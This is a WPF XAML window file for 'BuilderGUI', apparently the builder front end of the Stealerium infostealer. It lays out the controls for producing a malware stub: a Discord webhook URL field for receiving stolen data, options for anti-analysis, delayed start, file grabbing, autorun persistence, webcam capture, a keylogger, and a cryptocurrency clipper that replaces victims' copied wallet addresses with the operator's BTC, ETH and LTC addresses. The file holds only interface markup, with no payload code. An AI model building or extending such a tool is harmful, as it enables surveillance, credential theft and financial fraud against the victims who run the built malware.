BuilderGUI/MainWindow.xaml

<ui:FluentWindow x:Class="BuilderGUI.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:ui="http://schemas.lepo.co/wpfui/2022/xaml"
        xmlns:local="clr-namespace:BuilderGUI"
        ui:Design.Background="{DynamicResource ApplicationBackgroundBrush}"
        ui:Design.Foreground="{DynamicResource TextFillColorPrimaryBrush}"
        Foreground="{DynamicResource TextFillColorPrimaryBrush}"
        ExtendsContentIntoTitleBar="True"
        WindowBackdropType="Tabbed"
        Title="BuilderGUI" Height="750" Width="716">

    <Grid>
            <!-- Modern TitleBar -->
        <ui:TitleBar Grid.Row="0" OverridesDefaultStyle="True" ApplicationTheme="Dark"/>

        <!-- ScrollViewer added to handle overflow when the window is not maximized -->
        <ScrollViewer VerticalScrollBarVisibility="Auto">
            <Grid Margin="20">

                <!-- Column and Row Definitions must be before content -->
                <Grid.ColumnDefinitions>
                    <ColumnDefinition Width="*"/>
                </Grid.ColumnDefinitions>
                <Grid.RowDefinitions>
                    <RowDefinition Height="100"/>
                    <!-- Image row -->
                    <RowDefinition Height="Auto"/>
                    <!-- Discord Webhook and Settings -->
                    <RowDefinition Height="*"/>
                    <!-- Dynamic options -->
                    <RowDefinition Height="Auto"/>
                    <!-- Build button and status -->
                </Grid.RowDefinitions>


                <!-- Logo Image -->
                <Image Grid.Row="0" Source="/Resources/STEALERIUM.png" Height="100" HorizontalAlignment="Center" VerticalAlignment="Center" Margin="0,20,0,0"/>

                <!-- Main Settings Section -->
                <StackPanel Grid.Row="1" Orientation="Vertical" HorizontalAlignment="Center" VerticalAlignment="Top" Margin="0,20,0,0">
                    <!-- Stub Status Label -->
                    <ui:InfoBar Name="StubStatusLabel" Margin="0,0,0,10"/>
                    <!-- Discord Webhook URL Input -->
                    <Label Content="Discord Webhook URL:" Target="{Binding ElementName=WebhookUrlTextBox}"/>
                    <TextBox Name="WebhookUrlTextBox"   TextChanged="WebhookUrlTextBox_TextChanged" />
                    <!-- Test Webhook Button -->
                    <ui:Button Name="TestWebhookButton" Content="Test Webhook" Width="120" Margin="0,10,0,0" HorizontalAlignment="Center" Click="TestWebhookButton_Click"/>
                    <!-- Webhook Status Label -->
                    <ui:InfoBar Name="WebhookStatusLabel" Margin="0,10,0,0"/>
                </StackPanel>

                <!-- Configuration Options Section -->
                <ui:Card Grid.Row="2" Margin="0,10,0,0" Padding="10" MaxHeight="300">
                    <ScrollViewer VerticalScrollBarVisibility="Auto">
                        <StackPanel Orientation="Vertical" HorizontalAlignment="Left">
                            <TextBlock Text="Configuration Options" FontWeight="Bold" FontSize="14" Margin="0,0,0,10"/>
                            <CheckBox Name="DebugCheckBox" Content="Debug all exceptions to file" Margin="0,5,0,0"/>
                            <CheckBox Name="AntiAnalysisCheckBox" Content="Use anti analysis" />
                            <CheckBox Name="StartDelayCheckBox" Content="Use random start delay" />
                            <CheckBox Name="GrabberCheckBox" Content="File Grabber"/>
                            <!-- Startup Options CheckBox -->
                            <CheckBox Name="StartupCheckBox" Content="Install autorun" Checked="StartupCheckBox_Checked" Unchecked="StartupCheckBox_Unchecked"/>

                            <!-- Startup Options Panel (Initially Hidden) -->
                            <StackPanel Name="StartupOptionsPanel" Visibility="Collapsed" Margin="30,0,0,0" VerticalAlignment="Top">
                                <CheckBox Name="WebcamScreenshotCheckBox" Content="Create webcam screenshots" />
                                <CheckBox Name="KeyloggerCheckBox" Content="Install keylogger" />
                                <CheckBox Name="ClipperCheckBox" Content="Install clipper" Checked="ClipperCheckBox_Checked" Unchecked="ClipperCheckBox_Unchecked" />
                            </StackPanel>

                            <!-- Clipper Addresses Panel (Initially Hidden) -->
                            <StackPanel Name="ClipperAddressesPanel" Visibility="Collapsed" Margin="0,10,0,0" VerticalAlignment="Top">
                                <TextBlock Text="Clipper Addresses:" FontWeight="Bold" />
                                <Label Content="Your Bitcoin Address:" Target="{Binding ElementName=ClipperBTCTextBox}"/>
                                <TextBox Name="ClipperBTCTextBox"  Margin="0,0,0,10"/>
                                <Label Content="Your Ethereum Address:" Target="{Binding ElementName=ClipperETHTextBox}"/>
                                <TextBox Name="ClipperETHTextBox"  Margin="0,0,0,10"/>
                                <Label Content="Your Litecoin Address:" Target="{Binding ElementName=ClipperLTCTextBox}"/>
                                <TextBox Name="ClipperLTCTextBox" />
                            </StackPanel>
                        </StackPanel>
                    </ScrollViewer>
                </ui:Card>

                <!-- Build Button and Status -->
                <StackPanel Grid.Row="3" Orientation="Vertical" HorizontalAlignment="Center" Margin="0,20,0,0">
                    <Button Name="BuildButton" Content="Build" Width="120" Click="BuildButton_Click" IsEnabled="False" />
                    <TextBlock Name="BuildStatusLabel" Text="" Foreground="Green" Margin="10,5,10,0" TextWrapping="Wrap" TextAlignment="Center"/>
                </StackPanel>

            </Grid>
        </ScrollViewer>
    </Grid>
</ui:FluentWindow>
